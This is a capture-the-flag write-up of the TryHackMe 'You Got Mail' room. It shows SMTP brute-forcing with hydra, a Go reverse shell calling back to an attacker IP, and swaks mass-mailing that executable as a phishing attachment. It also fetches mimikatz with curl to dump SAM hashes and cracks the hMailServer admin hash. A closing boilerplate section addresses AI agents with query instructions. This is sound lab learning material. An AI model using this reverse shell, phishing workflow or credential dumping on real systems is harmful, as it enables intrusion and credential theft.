# You Got Mail

{% embed url="<https://tryhackme.com/room/yougotmail>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

### Target

We start with an Nmap scan and find some Windows-related ports, including 139/445 SMB, 3389 RDP, 5985 WinRM, some RPC ports >49000, as well as mail-related ports, 25,587 smtp, 110 pop3 and 143 imap.

<figure><img src="/files/9dAaPh3hdU0TZu7JqBCb" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
nmap -sC -sV -p 25,110,135,139,143,445,587,3389,5985,47001,49664-49669,49671,49673 ygm.thm -T4 
```

{% endcode %}

<figure><img src="/files/qrG0MPjuFLbbggQ9kFcZ" alt=""><figcaption></figcaption></figure>

### [brownbrick.co](https://brownbrick.co/)

In the assessment we have the authorization for a passive reconnaiceces on `https://brownbrick.co/`. On the Team page we'll find six mail adresses.&#x20;

```
https://brownbrick.co/
```

<figure><img src="/files/rKQmDWBBaMu1W3NmS1lt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Sw8CpFd8wWrRCNAhlR8S" alt=""><figcaption></figcaption></figure>

We save those mails to a file for later use.&#x20;

```
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co
```

<figure><img src="/files/UDdxuHQTpoEcCMFbNAL9" alt=""><figcaption></figcaption></figure>

## Shell as wrohit

{% hint style="info" %}
The use of cewl here is not a passive reconnaissance as required in the scenario. However, this is included here for traceability and reproducibility. The password can be found directly on the index page.
{% endhint %}

```
cewl --lowercase https://brownbrick.co/ > passwords.txt
```

We brute force the SMTP login with the mail addresses found and the keywords of the page as passwords. We have a hit for `lhedvig@brownbrick.co`.

```
hydra -L emails.txt -P passwords.txt ygm.thm smtp -I
```

<figure><img src="/files/Cm3QBvlKtVSy3f7bzAXf" alt=""><figcaption></figcaption></figure>

Now that we have access to a mail account, we can use it to send mails to the other mail addresses. Since the scenario is a phishing scenario, we will try it very simply with an executable.&#x20;

For this we use a reverse shell written in Go, as we have already used in the `AOC 24 Side Quest 4` <https://0xb0b.gitbook.io/writeups/tryhackme/2024/advent-of-cyber-24-side-quest/t4-krampus-festival#payload-preparation>.

{% code title="0xb0b.go" overflow="wrap" lineNumbers="true" %}

```go
package main

import (
    "net"
    "os/exec"
)

func main() {
    c, _ := net.Dial("tcp", "10.14.90.235:4445")
    cmd := exec.Command("powershell")
    cmd.Stdin = c
    cmd.Stdout = c
    cmd.Stderr = c
    cmd.Run()
}
```

{% endcode %}

This has to be compiled on a windows machine.

<figure><img src="/files/S9kRzTaewYdZbHj3pQUg" alt=""><figcaption></figcaption></figure>

Next, we use swaks in combination with xargs to send the mail to each email address we found with the executable as an attachment. We choose something simple as the subject and body.

{% code overflow="wrap" %}

```
xargs -I {} swaks --to "{}" --from "lhedvig@brownbrick.co" --header "Subject: kickoff documents" \
--body "see attached file" --attach-type application/octet-stream --attach @0xb0b.exe \
--server ygm.thm --port 25 --timeout 20s --auth LOGIN \
--auth-user lhedvig@brownbrick.co --auth-password REDACTED < emails.txt

```

{% endcode %}

<figure><img src="/files/3KHCdB1YAqRIQhAs0WDq" alt=""><figcaption></figcaption></figure>

We have set up a listener (before sending the mails)...

<figure><img src="/files/axNjlweVpOFYnkZC15kJ" alt=""><figcaption></figcaption></figure>

... And shortly afterwards we receive a connection back. We are the user `wrohit`. The user flag can be found at the user's Desktop.

<figure><img src="/files/88bscNoGmG6hNgSjZIQw" alt=""><figcaption></figcaption></figure>

## wrohit Password

The user `wrohit` is part of the Administrators group.&#x20;

<figure><img src="/files/CtJYizYRunQkynQpbwAS" alt=""><figcaption></figcaption></figure>

Furthermore there is no Windows Defender running:

```
Get-MpComputerStatus
```

<figure><img src="/files/sOjs5Ks7YVAZgUPLvNDL" alt=""><figcaption></figcaption></figure>

This allows us to use Mimikatz, to dump the hashes using `lsadump::sam`.

```
curl http://10.14.90.235/mimikatz.exe -o mimikatz.exe
```

<figure><img src="/files/iWwkpDGhAyXD5vJ2uiTy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AG2wOWb69qSHJXdF4psk" alt=""><figcaption></figcaption></figure>

The hash of `wrohit` is crackable.

<figure><img src="/files/n1IjcRDYBiB7HNhMYe0y" alt=""><figcaption></figcaption></figure>

## hMailServer Administrator Password

The password hash for the Administrators Dashboard of the hMailServer can be found at `C:\Program Files (x86)\hMailServer\Bin\hMailServer.INI`

<figure><img src="/files/orgOkBQDjWZNizMNfIeR" alt=""><figcaption></figcaption></figure>

It's a MD5 hash which is crackable:

<figure><img src="/files/IFWQGeb0cW9MsJLwEQg7" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xb0b.gitbook.io/writeups/tryhackme/2025/you-got-mail.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.